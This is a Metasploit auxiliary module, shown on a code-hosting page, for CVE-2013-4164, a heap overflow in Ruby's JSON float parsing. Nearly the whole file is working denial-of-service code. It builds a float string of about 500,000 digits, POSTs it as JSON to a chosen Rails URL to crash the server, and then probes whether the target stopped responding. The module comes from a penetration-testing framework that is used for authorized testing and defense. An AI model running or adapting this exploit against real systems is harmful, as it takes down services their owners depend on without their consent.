Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/http/rails_json_float_dos.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Dos89def initialize(info = {})10super(update_info(info,11'Name' => 'Ruby on Rails JSON Processor Floating Point Heap Overflow DoS',12'Description' => %q{13When Ruby attempts to convert a string representation of a large floating point14decimal number to its floating point equivalent, a heap-based buffer overflow15can be triggered. This module has been tested successfully on a Ruby on Rails application16using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application17crashes with a segfault error. Other versions of Ruby are reported to be affected.18},19'Author' =>20[21'Charlie Somerville', # original discoverer22'joev', # bash PoC23'todb', # Metasploit module24],25'License' => MSF_LICENSE,26'References' =>27[28[ 'CVE', '2013-4164' ],29[ 'OSVDB', '100113' ],30[ 'URL', 'https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/' ]31],32'DisclosureDate' => '2013-11-22'))33register_options(34[35OptString.new('TARGETURI', [false, 'The URL of the vulnerable Rails application', '/']),36OptString.new('HTTPVERB', [false, 'The HTTP verb to use', 'POST'])37])38end3940def uri41normalize_uri(target_uri.path.to_s)42end4344def verb45datastore['HTTPVERB'] || 'POST'46end4748def digit_pattern49@digit_pattern ||= rand(10_000).to_s50end5152def integer_part53digit_pattern54end5556def multiplier57(500_000 * (1.0/digit_pattern.size)).to_i58end5960def fractional_part61digit_pattern * multiplier62end6364# The evil_float seems to require some repeating element. Maybe65# it's just superstition, but straight up 300_002-lenth random66# numbers don't appear to trigger the vulnerability. Also, these are67# easier to produce, and slightly better than the static "1.1111..."68# for 300,000 decimal places.69def evil_float_string70[integer_part,fractional_part].join('.')71end7273def run74print_status "Using digit pattern of #{digit_pattern} taken to #{multiplier} places"75sploit = '['76sploit << evil_float_string77sploit << ']'78print_status "Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}"79target_available = true8081begin82res = send_request_cgi(83{84'method' => verb,85'uri' => uri,86'ctype' => "application/json",87'data' => sploit88})89rescue ::Rex::ConnectionRefused90print_error "Unable to connect. (Connection refused)"91target_available = false92rescue ::Rex::HostUnreachable93print_error "Unable to connect. (Host unreachable)"94target_available = false95rescue ::Rex::ConnectionTimeout96print_error "Unable to connect. (Timeout)"97target_available = false98end99100return unless target_available101102print_status "Checking availability"103begin104res = send_request_cgi({105'method' => verb,106'uri' => uri,107'ctype' => "application/json",108'data' => Rex::Text.rand_text_alpha(1+rand(64)).to_json109})110if res and res.body and res.body.size > 0111target_available = true112else113print_good "#{peer}#{uri} - DoS appears successful (No useful response from host)"114target_available = false115end116rescue ::Rex::ConnectionError, Errno::ECONNRESET117print_good "DoS appears successful (Host unreachable)"118target_available = false119end120121return unless target_available122123print_error "Target is still responsive, DoS was unsuccessful."124125end126end127128129